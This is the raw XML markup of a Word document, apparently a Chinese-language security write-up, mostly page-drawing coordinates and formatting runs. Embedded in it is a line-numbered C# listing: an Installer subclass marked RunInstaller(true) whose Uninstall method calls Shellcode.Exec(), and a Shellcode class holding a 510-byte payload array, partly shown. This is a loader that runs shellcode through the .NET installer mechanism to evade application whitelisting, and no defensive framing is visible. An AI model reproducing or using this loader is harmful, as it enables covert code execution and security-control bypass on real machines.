8737,4346,8739,4346,8740,4346,8741,4346,8743,4346,8744,4346,8746,4346,8748,4346,8749,4346,8751,4346,8753,4346,8755,4346,8757,4346,8759,4346,8761,4346,8763,4346,8765,4346,8768,4346,8770,4346,8772,4346,8775,4346,8777,4346,8780,4346,8783,4346,8785,4346,8788,4346,8791,4346,8794,4346,8797,4346,8800,4346,8803,4346,8806,4346,8810,4346,8813,4346,8817,4346,8820,4346,8824,4346,8827,4346,8831,4346,8835,4346,8839,4346,8843,4346,8847,4346,8852,4346,8856,4346,8860,4346,8865,4346,8869,4346,8874,4346,8879,4346,8884,4346,8889,4346,8894,4346,8899,4346,8904,4346,8909,4346,8915,4346,8920,4346,8926,4346,8932,4346,8938,4346,8944,4346,8950,4346,8956,4346,8962,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4346,8969,4345,8969,4345,8969,4345,8969,4345,8969,4345,8969,4345,8969,4345,8969,4344,8969,4344,8969,4344,8969,4344,8969,4344,8969,4343,8969,4343,8969,4343,8969,4343,8969,4342,8969,4342,8969,4342,8969,4341,8969,4341,8969,4341,8969,4340,8969,4340,8969,4339,8969,4339,8969,4338,8969,4338,8969,4337,8969,4337,8969,4336,8969,4336,8969,4335,8969,4334,8969,4334,8969,4333,8969,4332,8969,4332,8969,4331,8969,4330,8969,4329,8969,4328,8969,4328,8969,4327,8969,4326,8969,4325,8969,4324,8969,4323,8969,4322,8969,4321,8969,4320,8969,4318,8969,4317,8969,4316,8969,4315,8969,4314,8969,4312,8969,4311,8969,4310,8969,4308,8969,4307,8969,4305,8969,4304,8969,4302,8969,4301,8969,4299,8969,4298,8969,4296,8969,4294,8969,4292,8969,4291,8969,4289,8969,4287,8969,4285,8969,4283,8969,4281,8969,4279,8969,4277,8969,4275,8969,4273,8969,4271,8969,4268,8969,4266,8969,4264,8969,4261,8969,4259,8969,4256,8969,4254,8969,4251,8969,4249,8969,4246,8969,4243,8969,4241,8969,4238,8969,4235,8969,4232,8969,4229,8969,4226,8969,4226,8969,4226,8969,4226,8969,4226,8969,4226,8969,4226,8968,4226,8968,4226,8968,4226,8968,4226,8968,4226,8968,4226,8968,4226,8968,4226,8968,4226,8968,4226,8968,4226,8968,4226,8968,4226,8968,4226,8967,4226,8967,4226,8967,4226,8967,4226,8967,4226,8966,4226,8966,4226,8966,4226,8966,4226,8965,4226,8965,4226,8964,4226,8964,4226,8964,4226,8963,4226,8963,4226,8962,4226,8961,4226,8961,4226,8960,4226,8960,4226,8959,4226,8958,4226,8957,4226,8956,4226,8956,4226,8955,4226,8954,4226,8953,4226,8952,4226,8951,4226,8950,4226,8948,4226,8947,4226,8946,4226,8945,4226,8943,4226,8942,4226,8940,4226,8939,4226,8937,4226,8936,4226,8934,4226,8932,4226,8931,4226,8929,4226,8927,4226,8925,4226,8923,4226,8921,4226,8919,4226,8917,4226,8914,4226,8912,4226,8910,4226,8907,4226,8905,4226,8902,4226,8899,4226,8897,4226,8894,4226,8891,4226,8888,4226,8885,4226,8882,4226,8879,4226,8876,4226,8872,4226,8869,4226,8865,4226,8862,4226,8858,4226,8854,4226,8851,4226,8847,4226,8843,4226,8839,4226,8835,4226,8830,4226,8826,4226,8822,4226,8817,4226,8813,4226,8808,4226,8803,4226,8798,4226,8793,4226,8788,4226,8783,4226,8778,4226,8772,4226,8767,4226,8761,4226,8756,4226,8750,4226,8744,4226,8738,4226,8732,4226,8726,4226,8720,4226,8713e x" fillcolor="#fefefe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17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9503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18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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}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19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="58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20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System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ComponentModel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15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RunInstaller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true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]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21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public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class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Sample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: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System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Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14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Install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Installer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9503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22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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{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23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="51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24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public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override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void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Uninstall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System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Collections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IDictionary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savedSt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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ate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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9503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25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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{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26</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7582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27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Shellcode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.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exec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(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;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28</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9503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29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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}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30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9503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31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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}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32</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28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33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public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class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="28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Shellcode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34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{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35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public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static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void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Exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9503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36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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{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37</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43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38</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="1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byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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2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shellcode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new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>510</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="81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39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0xe4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0xe8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2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0" w:after="0" w:line="136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40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0x31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0x65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0x8b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0x60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0x8b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0x18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x48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41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0x20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0x72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0xb7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0x4a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0x31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xc9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42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0x31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0xc0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0xac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0x3c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0x61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0x7c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0x02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0x2c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0x20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0xc1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x41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43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0xe2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0xed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0x52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0x20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0x8b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0x3c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x48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44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0x66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0x78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0x18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0x02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0x85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0x72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x8b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45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0xc0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0x74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0x67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0x01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x8b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46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0x18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0x44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0x20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0xe3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x41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47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0x34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0x88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0xd6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0x31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0x31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0xc0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0xac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xc1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48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0x38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0xe0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0x75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0x4c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0x4c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0x24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x45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20.111pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:670" coordorigin="1490,970" coordsize="8990,670" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510,1628,1510,1627,1510,1625,1510,1624,1510,1622,1510,1620,1510,1618,1510,1616,1510,1614,1510,1612,1510,1610,1510,1608,1510,1605,1510,1602,1510,1600,1510,1597,1510,1594,1510,1591,1510,1588,1510,1585,1510,1581,1510,1578,1510,1574,1510,1570,1510,1566,1510,1562,1510,1558,1510,1554,1510,1549,1510,1544,1510,1540,1510,1535,1510,1530,1510,1524,1510,1519,1510,1513,1510,1508,1510,1502,1510,1496,1510,1490,1510,1483,1510,1477,1510,1470,1510,1463,1510,1456,1510,1449,1510,1441,1510,1434,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375,1510,1366,1510,1356,1510,1347,1510,1337,1510,1327,1510,1316,1510,1306,1510,1295,1510,1284,1510,1273,1510,1262,1510,1250,1510,1238,1510,1226,1510,1214,1510,1202,1510,1189,1510,1176,1510,1162,1510,1149,1510,1135,1510,1121,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:650" coordorigin="1490,990" coordsize="30,650" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1015,1517,1016,1517,1017,1517,1019,1517,1021,1517,1022,1517,1024,1517,1026,1517,1028,1517,1030,1517,1032,1517,1034,1517,1037,1517,1039,1517,1042,1517,1045,1517,1047,1517,1050,1517,1053,1517,1057,1517,1060,1517,1063,1517,1067,1517,1070,1517,1074,1517,1078,1517,1082,1517,1086,1517,1091,1517,1095,1517,1100,1517,1105,1517,1110,1517,1115,1517,1120,1517,1125,1517,1131,1517,1137,1517,1142,1517,1148,1517,1155,1517,1161,1517,1168,1517,1174,1517,1181,1517,1188,1517,1196,1517,1203,1517,1211,1517,1218,1517,1226,1517,1235,1517,1243,1517,1252,1517,1260,1517,1269,1517,1279,1517,1288,1517,1298,1517,1308,1517,1318,1517,1328,1517,1338,1517,1349,1517,1360,1517,1371,1517,1382,1517,1394,1517,1406,1517,1418,1517,1430,1517,1443,1517,1456,1517,1469,1517,1482,1517,1495,1517,1509,1517,1523,1517,1538,1517,1552,1517,1567,1517,1582,1517,1597,1517,1613,1517,1629,1517,1645e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:630" coordorigin="1490,1630" coordsize="8990,630" path="m1510,1645l1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1511,1645,1512,1645,1512,1645,1514,1645,1515,1645,1517,1645,1519,1645,1521,1645,1524,1645,1528,1645,1532,1645,1536,1645,1541,1645,1546,1645,1552,1645,1559,1645,1566,1645,1575,1645,1583,1645,1593,1645,1603,1645,1615,1645,1627,1645,1640,1645,1654,1645,1668,1645,1684,1645,1701,1645,1719,1645,1738,1645,1758,1645,1780,1645,1802,1645,1826,1645,1851,1645,1877,1645,1904,1645,1933,1645,1963,1645,1995,1645,2028,1645,2063,1645,2099,1645,2136,1645,2175,1645,2216,1645,2259,1645,2303,1645,2348,1645,2396,1645,2445,1645,2496,1645,2549,1645,2604,1645,2660,1645,2719,1645,2779,1645,2841,1645,2906,1645,2972,1645,3041,1645,3112,1645,3184,1645,3259,1645,3336,1645,3416,1645,3498,1645,3582,1645,3668,1645,3757,1645,3848,1645,3941,1645,4037,1645,4136,1645,4236,1645,4340,1645,4446,1645,4555,1645,4666,1645,4780,1645,4897,1645,5017,1645,5139,1645,5264,1645,5392,1645,5523,1645,5657,1645,5793,1645,5933,1645,6076,1645,6222,1645,6370,1645,6522,1645,6677,1645,6835,1645,6997,1645,7161,1645,7329,1645,7500,1645,7675,1645,7853,1645,8034,1645,8219,1645,8407,1645,8598,1645,8793,1645,8992,1645,9194,1645,9400,1645,9609,1645,9823,1645,10039,1645,10260,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1646,10484,1646,10484,1646,10484,1646,10484,1647,10484,1647,10484,1647,10484,1648,10484,1648,10484,1649,10484,1649,10484,1650,10484,1651,10484,1651,10484,1652,10484,1653,10484,1654,10484,1655,10484,1656,10484,1657,10484,1658,10484,1660,10484,1661,10484,1662,10484,1664,10484,1665,10484,1667,10484,1669,10484,1671,10484,1673,10484,1675,10484,1677,10484,1679,10484,1681,10484,1684,10484,1686,10484,1689,10484,1692,10484,1694,10484,1697,10484,1701,10484,1704,10484,1707,10484,1711,10484,1714,10484,1718,10484,1722,10484,1726,10484,1730,10484,1734,10484,1738,10484,1743,10484,1748,10484,1752,10484,1757,10484,1762,10484,1768,10484,1773,10484,1779,10484,1784,10484,1790,10484,1796,10484,1803,10484,1809,10484,1816,10484,1822,10484,1829,10484,1836,10484,1844,10484,1851,10484,1859,10484,1867,10484,1875,10484,1883,10484,1891,10484,1900,10484,1909,10484,1918,10484,1927,10484,1936,10484,1946,10484,1955,10484,1966,10484,1976,10484,1986,10484,1997,10484,2008,10484,2019,10484,2030,10484,2042,10484,2054,10484,2066,10484,2078,10484,2090,10484,2103,10484,2116,10484,2129,10484,2143,10484,2156,10484,2170,10484,2185,10484,2199,10484,2214,10484,2229,10484,2244,10484,2259,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10484,2275,10483,2275,10482,2275,10482,2275,10480,2275,10479,2275,10477,2275,10475,2275,10473,2275,10470,2275,10466,2275,10462,2275,10458,2275,10453,2275,10448,2275,10442,2275,10435,2275,10428,2275,10419,2275,10411,2275,10401,2275,10391,2275,10379,2275,10367,2275,10354,2275,10340,2275,10326,2275,10310,2275,10293,2275,10275,2275,10256,2275,10236,2275,10215,2275,10192,2275,10168,2275,10143,2275,10117,2275,10090,2275,10061,2275,10031,2275,9999,2275,9966,2275,9931,2275,9895,2275,9858,2275,9819,2275,9778,2275,9735,2275,9691,2275,9646,2275,9598,2275,9549,2275,9498,2275,9445,2275,9391,2275,9334,2275,9275,2275,9215,2275,9153,2275,9088,2275,9022,2275,8953,2275,8883,2275,8810,2275,8735,2275,8658,2275,8578,2275,8497,2275,8413,2275,8326,2275,8238,2275,8146,2275,8053,2275,7957,2275,7859,2275,7758,2275,7654,2275,7548,2275,7439,2275,7328,2275,7214,2275,7097,2275,6977,2275,6855,2275,6730,2275,6602,2275,6471,2275,6337,2275,6201,2275,6061,2275,5918,2275,5773,2275,5624,2275,5472,2275,5317,2275,5159,2275,4997,2275,4833,2275,4665,2275,4494,2275,4319,2275,4141,2275,3960,2275,3776,2275,3587,2275,3396,2275,3201,2275,3002,2275,2800,2275,2594,2275,2385,2275,2172,2275,1955,2275,1734,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2275,1510,2274,1510,2274,1510,2274,1510,2274,1510,2274,1510,2273,1510,2273,1510,2273,1510,2272,1510,2272,1510,2271,1510,2271,1510,2270,1510,2269,1510,2269,1510,2268,1510,2267,1510,2266,1510,2265,1510,2264,1510,2263,1510,2262,1510,2260,1510,2259,1510,2258,1510,2256,1510,2255,1510,2253,1510,2251,1510,2249,1510,2247,1510,2245,151